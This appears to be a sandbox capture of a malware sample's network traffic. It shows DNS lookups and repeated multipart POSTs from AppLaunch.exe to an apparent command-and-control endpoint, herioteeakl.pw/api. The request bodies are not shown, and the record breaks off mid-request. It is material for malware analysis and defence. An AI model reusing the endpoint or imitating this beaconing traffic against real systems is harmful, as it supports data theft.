Request

88.156.103.20.in-addr.arpa

IN PTR

Response
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301370_1WTDA3QMJSZ92RY3W&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301370_1WTDA3QMJSZ92RY3W&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 397379
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 5907C3886DDE492EBE0E6B28634CE86B Ref B: AMS04EDGE2913 Ref C: 2023-11-14T00:31:11Z
date: Tue, 14 Nov 2023 00:31:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301045_1V3F59LO4JDHHM1AD&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301045_1V3F59LO4JDHHM1AD&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 360487
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D57EE7C11E184C66A6CA417DDA160C1C Ref B: AMS04EDGE2913 Ref C: 2023-11-14T00:31:11Z
date: Tue, 14 Nov 2023 00:31:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300947_1GOYB38DJXHYRW08B&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300947_1GOYB38DJXHYRW08B&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 389552
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4C28722ADC434F69894458B5149B53B3 Ref B: AMS04EDGE2913 Ref C: 2023-11-14T00:31:11Z
date: Tue, 14 Nov 2023 00:31:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301380_1RKU3AKJ11J41126R&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301380_1RKU3AKJ11J41126R&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 349126
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: ADA08BE18C514E7CB9AD3AA3102C968E Ref B: AMS04EDGE2913 Ref C: 2023-11-14T00:31:11Z
date: Tue, 14 Nov 2023 00:31:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317300937_1HHU6SR72RIO6JU61&pid=21.2&w=1920&h=1080&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317300937_1HHU6SR72RIO6JU61&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 373128
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0E3FC34559EA49039C57DCF58B7382E8 Ref B: AMS04EDGE2913 Ref C: 2023-11-14T00:31:11Z
date: Tue, 14 Nov 2023 00:31:10 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239317301478_1ATXLTSLM5UX4ZJYP&pid=21.2&w=1080&h=1920&c=4

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239317301478_1ATXLTSLM5UX4ZJYP&pid=21.2&w=1080&h=1920&c=4 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 498337
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A76F018CB645444C84F150F5060B198C Ref B: AMS04EDGE2913 Ref C: 2023-11-14T00:31:11Z
date: Tue, 14 Nov 2023 00:31:11 GMT
DNS

herioteeakl.pw

AppLaunch.exe

Remote address:

8.8.8.8:53

Request

herioteeakl.pw

IN A

Response

herioteeakl.pw

IN A

104.21.42.121

herioteeakl.pw

IN A

172.67.161.219
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 8
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=94phmpeuvim11ainofohiehn6e; expires=Fri, 08 Mar 2024 18:18:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N4emzKyruxh08MwCwJBVA00Yt0CtnVnD%2Fm88LlG%2FiKQyf8JM0Ppcw7cUe%2Bb8jI2bjai8CC4KTipUx1QgntoRD2W8V%2F2ZTFxHH9liz%2F68CR1XcGCjRFMjvPrjdkgpX2eOOw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26b48b3c65f0-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=790ns1qatql2uo8vdnn50utmma; expires=Fri, 08 Mar 2024 18:18:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wyIswl2FpmLXukRQaM8zt8HubCh%2FSYRme3j90wWW3nG6sPSOCTEljm6%2By3%2BX58u6O2eokLszbuD6%2FJ0IW8WERFM5FtFsHUcJFGGDgfDfSLuDd9Gp2seXTtNLympJYIwT1g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26b77cff65f0-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Host: herioteeakl.pw
Content-Length: 64
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=itvhhtld8oioq7ldk1p11425ta; expires=Fri, 08 Mar 2024 18:18:01 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:22 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3NSbKWKCK2PMy2Eb3m6lX%2FE%2Fnp2vctbWvt4PDcGd9rvfL4x7dE4ZPU71xK2Q%2F4lRRgwBo8TbClzaH3oj8i380ZnsJR7lnE1%2F75oqVz4CY5MjHtjJmV9YfP%2BzvqlqLgeWpg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26b658b10a6d-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nb2v32dup0buncssv29h880fs4; expires=Fri, 08 Mar 2024 18:18:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dxeJpUXflY8XJItgSwHd%2BqGnIgg4E9UX4RfGdBNNTtXemR0IdrHP0%2FArmrEO8sYhtZFhPxxR7dasxnzLNrGc94KXzeP%2BLSv2r13%2BoVcwKfbWzrQk3mcPO9IK1Ivba724YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26b87da70109-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=srosghriduclffnkrdm88olhvt; expires=Fri, 08 Mar 2024 18:18:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rGxcqz5s9TxibwQVXls7v3jDMDPbvvYigTvPRf8VAY%2FOKQFH%2FUsk2fXyTEPVcygurHiBqiptRfCkgZHQXny1D70i%2BzSob7gj5rwNEKfEB0Kc6lojz%2F87CLHDEfyOLkJGeA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26b99cd35c3d-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=ca2r1fjdk3qjvuo4h1s7grvg2s; expires=Fri, 08 Mar 2024 18:18:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xa3VqGjpMhW4M4RZ%2F%2FVmIuBah8eNn6dyTcrl0kkPoLGdiYGMdSqtghYCvNrZ1cQnNQmDd6eU3Yh5UCWR5nW8XWdLFzT2p05utYSm8Ye2Eze0%2FnGGPmABXSTadty2ja802A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26babc3166d0-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=15d30so5o9clfcu8ennr1gfjci; expires=Fri, 08 Mar 2024 18:18:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2Z%2BcYwioKzQE%2B4DWykJJIgGTvC%2F%2B%2FGsUMcPwXL2sEWOPmGMw1a5zjANiCSrksenPAt1PkR85zfwk%2BOB%2FcsSfHXRpV%2F7f7FMAazuUzLC0bcrHlLQRi4tPhai28qE4m6Yccw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26bc3f1566c1-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=jli79d3s4lgs0qtdfapgif9qqt; expires=Fri, 08 Mar 2024 18:18:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dwysWR0M5u7C94iglEkn5SaMv9sj7wASOS8nA2mzx5VD85qlA7zTr2uP%2B09%2FUNIalH13OQdriYwuM34khTmc%2BQF44FOnTMZTkuBjtODRx%2BBwsiGL8tmgVN0yAvY4rfReyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26bd6afe66ff-AMS
DNS

121.42.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.42.21.104.in-addr.arpa

IN PTR

Response
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=57188r20r2gcrk9nrm5n28ok27; expires=Fri, 08 Mar 2024 18:18:02 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:23 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YwHOVcWaamslQPFK0smj%2FLJJP7Zn91F%2BN23aNioU%2FpMxYCKAyt50BNsyboqGsYEsuSpxOt79UbJu3FbucjMC%2BKj%2BGzKiTBdoYAxYlBb50NP%2F1kBY6BE81fEU8w%2ByqpFAkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26be8c860b7f-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=39mq7tq0kar8j5a909tji0rgfr; expires=Fri, 08 Mar 2024 18:18:03 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:24 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WBCf432bND%2B4nU6f5Th3ojl%2F9QHL1yeN%2FJSJDHRphUPklFQis934JWrnTdBnpiY3nxzgBnSjN%2FnL2xUKZ3YPdRxnmLrrTY6iXLHtH4lWltLfmt8WV4dYM%2FVANkivC0Cojg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26bfafde6564-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 544
Host: herioteeakl.pw

Response

HTTP/1.1 200 OK

Date: Tue, 14 Nov 2023 00:31:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=cc3coasormiosnam7kghsdmfpm; expires=Fri, 08 Mar 2024 18:18:03 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 13 Jan 2024 00:31:24 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EGkcLuIrxi4e8r%2Bkc62Ec329T8%2Fg8Qa5oL37dC9TI9a9mSYC%2BMmIeHXTIy%2BZ1eGFIEv2%2FDcN0gw9lZxs8qq1CICM6Gz2BgaN1ZL%2BBuadbxKxajnXyNObpEIRU0G%2FTXOS%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 825b26c0e914b957-AMS
POST

http://herioteeakl.pw/api

AppLaunch.exe

Remote address:

104.21.42.121:80

Request

